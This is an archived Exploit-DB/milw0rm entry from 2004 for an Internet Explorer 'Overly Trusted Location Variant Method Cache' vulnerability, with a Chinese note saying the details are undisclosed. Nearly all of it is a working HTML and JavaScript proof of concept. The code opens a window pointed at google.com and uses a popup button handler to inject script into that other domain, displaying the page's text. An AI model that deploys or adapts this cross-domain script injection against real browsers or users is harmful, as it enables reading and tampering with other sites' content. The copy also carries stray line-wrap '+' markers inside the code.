https://www.exploit-db.com/exploits/354

漏洞细节尚未披露

<html>
<body>
<b><font size="5">Overly Trusted Location Variant Method Cache Vulnerability</font></b>
<br><br>
<a href="#refresh" onclick="setTimeout('document.execCommand('Refresh')',1000);"><font size=4 color=red>GO!</font></a><br><
+br>
This vulnerability seems to be unstable. For some reason, it crashes my internet explorer unless the exploit is executed onlo
+ad and even then it crashes sometimes.
<br><br>

<script>

var w=window.open("javascript:''","_blank","width=100,height=100,left=300,top=300");
var cpop=w.createPopup();
w.location.assign("http://google.com");
cpop.document.body.innerHTML='<button onactivate="document.parentWindow.location.cache=parent.open;var myint=setInterval(func
+tion(){try{var testvar=parent.document.write;}catch(e){clearInterval(myint);document.parentWindow.location.cache('javascrip
+t:alert(\'Javascript injected!\'+document.body.innerText)','_self')}},1000 /* theres some ratio of this number to the
+ chance of internet explorer crashing at offset 0019d19d :) */);"></button>';
cpop.show(1,1,1,1);

</script>
</body>
</html>


// milw0rm.com [2004-07-18]